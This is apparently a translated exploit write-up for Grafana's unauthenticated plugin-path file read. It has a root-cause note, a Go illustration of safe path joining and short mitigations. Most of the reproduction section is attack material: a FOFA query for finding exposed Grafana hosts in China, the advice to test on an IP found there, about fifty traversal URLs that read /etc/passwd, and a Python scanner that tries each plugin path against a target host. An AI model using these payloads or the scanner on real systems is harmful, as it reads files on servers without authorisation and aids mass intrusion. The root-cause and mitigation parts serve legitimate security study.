Vulnerability description
Grafana is a cross-platform, open-source data visualization web application platform. Once a user configures a connected data source, Grafana can display charts and alerts in a web browser.
Grafana has an unauthenticated arbitrary file read vulnerability: an attacker can use it to read arbitrary files on the host without any authentication.
Affected versions
Per testing, the current latest version (Grafana v8.2.6) is still vulnerable.
Root cause
The cause lies in plugin handling: inspecting the code shows that the plugin directory is joined directly with requestedFile, with no filtering.
See this article: https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw
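To make the root cause concrete, the following is an added illustration (not Grafana's own code) of the unchecked join described above, next to a hardened version that confines the resolved path to the plugin directory; the directory path and file names are constructed sample values.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// vulnerableJoin mirrors the flaw described above (a constructed illustration,
// not Grafana's code): the plugin directory and requestedFile are joined with
// no check that the result is still inside the plugin directory, so a
// requestedFile made of "../" segments resolves to an arbitrary host path.
func vulnerableJoin(pluginDir, requestedFile string) string {
	return filepath.Join(pluginDir, requestedFile)
}

// safeJoin resolves requestedFile under pluginDir and rejects any result that
// escapes it. filepath.Join already collapses "..", so the check is made on
// the cleaned result via filepath.Rel rather than by blocking the substring
// "../" in the input, which a string filter alone would handle poorly.
func safeJoin(pluginDir, requestedFile string) (string, error) {
	base := filepath.Clean(pluginDir)
	full := filepath.Join(base, requestedFile)
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errors.New("requested file escapes plugin directory: " + requestedFile)
	}
	// This is a lexical check only; symlinks inside pluginDir would still need
	// filepath.EvalSymlinks against the real filesystem.
	return full, nil
}

func main() {
	// Constructed sample values in the shape of the requests shown on this page.
	pluginDir := "/usr/share/grafana/public/plugins/alertlist"
	requested := []string{"module.js", "../../../../../../../../etc/passwd"}
	for _, r := range requested {
		fmt.Printf("unsafe: %s -> %s\n", r, vulnerableJoin(pluginDir, r))
		if p, err := safeJoin(pluginDir, r); err != nil {
			fmt.Printf("safe:   %s -> rejected (%v)\n", r, err)
		} else {
			fmt.Printf("safe:   %s -> %s\n", r, p)
		}
	}
}
```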
Reproduction
FOFA query: app="Grafana" && country="CN" && body="v8."
Pick an IP found on FOFA for testing; simply capture the request and change the path, and the file contents can be read:
Fuzzed plugin paths:
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

Plugin names used for the fuzzing list:
alertmanager grafana loki postgres grafana-azure-monitor-datasource mixed prometheus cloudwatch graphite mssql tempo dashboard influxdb mysql testdata elasticsearch jaeger opentsdb zipkin alertGroups bargauge debug graph live piechart status-history timeseries alertlist candlestick gauge heatmap logs pluginlist table welcome annolist canvas geomap histogram news stat table-old xychart barchart dashlist gettingstarted icon nodeGraph state-timeline text
Script
import requests
import sys

# Target host[:port] is taken from the first command-line argument.
args = str(sys.argv[1])
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
}
# paload.txt holds one plugin name per line (the plugin list above).
with open("./paload.txt", "r") as f:
    for line in f:
        name = line.rstrip()
        url = "http://" + args + "/public/plugins/" + name + "/../../../../../../../../../../../etc/passwd"
        req = requests.post(url, headers=headers, timeout=(3, 7), allow_redirects=False)
        a = req.text
        # The original tested `a in str1`, which checks the reverse containment
        # and never matches; the response body must be checked for "root".
        if 'root' in a:
            print('Confirmed that the path ' + name + ' exists and is vulnerable!')
            print(url)
        else:
            print('Not vulnerable!')
Script improvements: multithreading and batch URL checking.
Vulnerability analysis
Not yet done.
Reference: https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw
Remediation
Watch the vendor home page for updates: Grafana: The open observability platform | Grafana Labs
Temporary mitigations:
1. Use a firewall or other security device to set an access policy and restrict access to an allowlist.
2. Unless necessary, do not expose the system to the public internet.